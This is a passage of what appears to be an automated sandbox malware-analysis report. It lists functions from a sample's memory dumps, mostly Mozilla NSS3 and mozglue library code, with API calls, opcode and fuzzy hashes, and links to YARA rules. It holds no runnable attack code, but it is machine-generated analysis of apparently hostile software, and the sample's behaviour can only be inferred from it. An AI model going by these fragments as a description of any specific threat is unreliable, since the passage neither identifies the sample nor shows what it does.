                                                                                            • Part of subcall function 6CBA0BE0: malloc.MOZGLUE(6CB98D2D,?,00000000,?), ref: 6CBA0BF8
                                                                                            • Part of subcall function 6CBA0BE0: TlsGetValue.KERNEL32(6CB98D2D,?,00000000,?), ref: 6CBA0C15
                                                                                          • memcpy.VCRUNTIME140(?,?,6CBB9767,00000000,00000000,6CBB7FFA,?,6CBB9767,?,8B7874C0,0000A48E), ref: 6CBCEE33
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                          • String ID:
                                                                                          • API String ID: 3903481028-0
                                                                                          • Opcode ID: c9426992887f40a477b32ac26f88db0c9f9d0b0b3f26f0f2e1f335f7614db676
                                                                                          • Instruction ID: ccb8a7a40a97b702829e1dfa89dfee9c5635877b5751264e1bc69dede157914e
                                                                                          • Opcode Fuzzy Hash: c9426992887f40a477b32ac26f88db0c9f9d0b0b3f26f0f2e1f335f7614db676
                                                                                          • Instruction Fuzzy Hash: F711A3B1B007D7EBEB509EA5DC85B0AB3A8EB0439DF204535E91986A00E330F464C7E3
                                                                                          Function 6CA3B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6CA3B4F5
                                                                                          • AcquireSRWLockExclusive.KERNEL32(6CAAF4B8), ref: 6CA3B502
                                                                                          • ReleaseSRWLockExclusive.KERNEL32(6CAAF4B8), ref: 6CA3B542
                                                                                          • free.MOZGLUE(?), ref: 6CA3B578
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                          • String ID:
                                                                                          • API String ID: 2047719359-0
                                                                                          • Opcode ID: 5870bb2c58b38f04cf28d316dc51d93660962d2054351120baeaa33102adea28
                                                                                          • Instruction ID: 072f0e4800f484e91e9d148baa5f15ac61b212bf62cea6326b8a981b3283db88
                                                                                          • Opcode Fuzzy Hash: 5870bb2c58b38f04cf28d316dc51d93660962d2054351120baeaa33102adea28
                                                                                          • Instruction Fuzzy Hash: BD11B731904F56CBD7158F69E9107A5B3B1FF96318F14A70EE84E93A01EBB1B1C687A0
                                                                                          Function 6CB68DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                          • String ID:
                                                                                          • API String ID: 284873373-0
                                                                                          • Opcode ID: cc9e0d77ad5a5481b23739b80e8a19e5f23c9264226af1ad386a35fa839fba27
                                                                                          • Instruction ID: b3794a398bb24d38be93494172eb08b90749e4249bbaaa93353a2c8c73810012
                                                                                          • Opcode Fuzzy Hash: cc9e0d77ad5a5481b23739b80e8a19e5f23c9264226af1ad386a35fa839fba27
                                                                                          • Instruction Fuzzy Hash: 42116D71A056509BD700AF79D44815EBBF4FF06754F014929D888D7B00E731E8548BD2
                                                                                          Function 6CBEAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CBD5F17,?,?,?,?,?,?,?,?,6CBDAAD4), ref: 6CBEAC94
                                                                                          • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CBD5F17,?,?,?,?,?,?,?,?,6CBDAAD4), ref: 6CBEACA6
                                                                                          • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CBDAAD4), ref: 6CBEACC0
                                                                                          • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CBDAAD4), ref: 6CBEACDB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$DestroyFreeK11_Monitor
                                                                                          • String ID:
                                                                                          • API String ID: 3989322779-0
                                                                                          • Opcode ID: 316221225a58763f8665d073d7e330b50e628e23887bba68895b76428bbd32a3
                                                                                          • Instruction ID: ebb976005e811a70c40adad05abe22b27d11013c92822faafb7cba8588120217
                                                                                          • Opcode Fuzzy Hash: 316221225a58763f8665d073d7e330b50e628e23887bba68895b76428bbd32a3
                                                                                          • Instruction Fuzzy Hash: AB018CB1601B519BE710DF29D908757BBF8FF04A99B004839D85AC3B00EB30F054CB92
                                                                                          Function 6CBEAC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PK11_FreeSymKey.NSS3(?,6CBD5D40,00000000,?,?,6CBC6AC6,6CBD639C), ref: 6CBEAC2D
                                                                                            • Part of subcall function 6CB8ADC0: TlsGetValue.KERNEL32(?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE10
                                                                                            • Part of subcall function 6CB8ADC0: EnterCriticalSection.KERNEL32(?,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE24
                                                                                            • Part of subcall function 6CB8ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CB6D079,00000000,00000001), ref: 6CB8AE5A
                                                                                            • Part of subcall function 6CB8ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE6F
                                                                                            • Part of subcall function 6CB8ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AE7F
                                                                                            • Part of subcall function 6CB8ADC0: TlsGetValue.KERNEL32(?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AEB1
                                                                                            • Part of subcall function 6CB8ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB6CDBB,?,6CB6D079,00000000,00000001), ref: 6CB8AEC9
                                                                                          • PK11_FreeSymKey.NSS3(?,6CBD5D40,00000000,?,?,6CBC6AC6,6CBD639C), ref: 6CBEAC44
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CBD5D40,00000000,?,?,6CBC6AC6,6CBD639C), ref: 6CBEAC59
                                                                                          • free.MOZGLUE(8CB6FF01,6CBC6AC6,6CBD639C,?,?,?,?,?,?,?,?,?,6CBD5D40,00000000,?,6CBDAAD4), ref: 6CBEAC62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                          • String ID:
                                                                                          • API String ID: 1595327144-0
                                                                                          • Opcode ID: 7c320ac3f2e5a1bbc30204b78407df7e4efe059634c600e3ae03f5dc482c5230
                                                                                          • Instruction ID: c120f53fdd36058cf1e0c17bb386264fffb8c73b6c80034220582cf2f1af604e
                                                                                          • Opcode Fuzzy Hash: 7c320ac3f2e5a1bbc30204b78407df7e4efe059634c600e3ae03f5dc482c5230
                                                                                          • Instruction Fuzzy Hash: C8012CB56012509BDB00DF15ECC0B46BBBCEF48B59F188068E9498F746D735E849CFA2
                                                                                          Function 00418D80 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileA.KERNEL32(004135FE,80000000,00000003,00000000,00000003,00000080,00000000,?,004135FE,?), ref: 00418D9C
                                                                                          • GetFileSizeEx.KERNEL32(000000FF,004135FE), ref: 00418DB9
                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00418DC7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseCreateHandleSize
                                                                                          • String ID:
                                                                                          • API String ID: 1378416451-0
                                                                                          • Opcode ID: 7d4822001714072e4f61ca82e69402512ca1f54a1caf0bddbc00baf73007a473
                                                                                          • Instruction ID: 770d00e3666ed0433759a64a5a444c5c6416efc3bd62b2105a0957605b161097
                                                                                          • Opcode Fuzzy Hash: 7d4822001714072e4f61ca82e69402512ca1f54a1caf0bddbc00baf73007a473
                                                                                          • Instruction Fuzzy Hash: 7AF04F35F00708BBDB24DBB0EC59FDE77BAAB58710F10C258F611A72C0DA7496418B45
                                                                                          Function 6CC5CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalDeleteSectionfree
                                                                                          • String ID:
                                                                                          • API String ID: 2988086103-0
                                                                                          • Opcode ID: 5299fe4469037dec995eeab4e7ad376280b722623a38917b1104a7dd26954926
                                                                                          • Instruction ID: 0e07c4f34749cc3a49e658e0def99ce83af0b4257524e8719013532f1cc304ec
                                                                                          • Opcode Fuzzy Hash: 5299fe4469037dec995eeab4e7ad376280b722623a38917b1104a7dd26954926
                                                                                          • Instruction Fuzzy Hash: AAE065767006089FCA10EFA8DC84C8777BCEE4A2707150565E691C3700D631F905CBE1
                                                                                          Function 6CB94D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB94D57
                                                                                          • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CB94DE6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorR_snprintf
                                                                                          • String ID: %d.%d
                                                                                          • API String ID: 2298970422-3954714993
                                                                                          • Opcode ID: 2ec137891848a8fe31cc38064c2f0d89aa794da003e37f4e2df6811a7c47acaa
                                                                                          • Instruction ID: 609ab4f84f43a2a849c87b21c9a45e1937bbae5c178773261968ecc2df22c57d
                                                                                          • Opcode Fuzzy Hash: 2ec137891848a8fe31cc38064c2f0d89aa794da003e37f4e2df6811a7c47acaa
                                                                                          • Instruction Fuzzy Hash: DE31FEB2D042686BEB109B619C45BFF7778EF45308F050439ED159B751EB309D05CBA2
                                                                                          Function 6CA63CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CA63D19
                                                                                          • mozalloc_abort.MOZGLUE(?), ref: 6CA63D6C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _errnomozalloc_abort
                                                                                          • String ID: d
                                                                                          • API String ID: 3471241338-2564639436
                                                                                          • Opcode ID: eb7649d87e889d654c3dec5e2c7420e76dd0d8a333d5f414e66de85ef767c1f4
                                                                                          • Instruction ID: 499f11f91ce279747c3d31dce6aafa5046bd4f96370487a1eac382d6e9b5e102
                                                                                          • Opcode Fuzzy Hash: eb7649d87e889d654c3dec5e2c7420e76dd0d8a333d5f414e66de85ef767c1f4
                                                                                          • Instruction Fuzzy Hash: 4D110835E04749D7DF058FAAD8154EDB775EF96218B48C718DC8557A01EB30A5C6C350
                                                                                          Function 6CB30F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_GetPageSize.NSS3(6CB30936,FFFFE8AE,?,6CAC16B7,00000000,?,6CB30936,00000000,?,6CAC204A), ref: 6CB30F1B
                                                                                            • Part of subcall function 6CB31370: GetSystemInfo.KERNEL32(?,?,?,?,6CB30936,?,6CB30F20,6CB30936,FFFFE8AE,?,6CAC16B7,00000000,?,6CB30936,00000000), ref: 6CB3138F
                                                                                          • PR_NewLogModule.NSS3(clock,6CB30936,FFFFE8AE,?,6CAC16B7,00000000,?,6CB30936,00000000,?,6CAC204A), ref: 6CB30F25
                                                                                            • Part of subcall function 6CB31110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6CB30936,00000001,00000040), ref: 6CB31130
                                                                                            • Part of subcall function 6CB31110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB30936,00000001,00000040), ref: 6CB31142
                                                                                            • Part of subcall function 6CB31110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB30936,00000001), ref: 6CB31167
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoModulePageSecureSizeSystemcallocstrdup
                                                                                          • String ID: clock
                                                                                          • API String ID: 536403800-3195780754
                                                                                          • Opcode ID: c923aa5f12f5e29bd222e394ac84fae5581c6e8820e8d9a7da3cb805aab61d51
                                                                                          • Instruction ID: e2dcc70fba9697bbcc92bb030537612dcf121e1d004351457d2e39c8367d7ddc
                                                                                          • Opcode Fuzzy Hash: c923aa5f12f5e29bd222e394ac84fae5581c6e8820e8d9a7da3cb805aab61d51
                                                                                          • Instruction Fuzzy Hash: 08D012316041B465C6116697AC49BDFB7BCD7C3379F146836E12C42D108A6890DFD276
                                                                                          Function 6CBA0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$calloc
                                                                                          • String ID:
                                                                                          • API String ID: 3339632435-0
                                                                                          • Opcode ID: 48b05d34f9fbac29fae90482af04f0c8f57e63892d57103d56432d633b01f89d
                                                                                          • Instruction ID: 769f77916846f4da456b55cdef0f06e107255b3302688570862b61fe2cc4d530
                                                                                          • Opcode Fuzzy Hash: 48b05d34f9fbac29fae90482af04f0c8f57e63892d57103d56432d633b01f89d
                                                                                          • Instruction Fuzzy Hash: 70319270E483D0CFDB006FB8E5882597BB4FF06349F114669D8DAC7A21DB358496EB82
                                                                                          Function 6CBA0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CB42AF5,?,?,?,?,?,6CB40A1B,00000000), ref: 6CBA0F1A
                                                                                          • malloc.MOZGLUE(00000001), ref: 6CBA0F30
                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CBA0F42
                                                                                          • TlsGetValue.KERNEL32 ref: 6CBA0F5B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Valuemallocmemcpystrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2332725481-0
                                                                                          • Opcode ID: 9a1ca2ed131a0e7b1742e503df18722c714687235dcd5812f79ea62235436f67
                                                                                          • Instruction ID: a40409b3ffad21c865a3c34b1ca2541f87cab6f26266d8ffcd95f4915f820cb4
                                                                                          • Opcode Fuzzy Hash: 9a1ca2ed131a0e7b1742e503df18722c714687235dcd5812f79ea62235436f67
                                                                                          • Instruction Fuzzy Hash: BC01DD71E042D05BEB101BBEAD4455A7A7CEF56299F010125EC5DD3A21EB32C456C5E2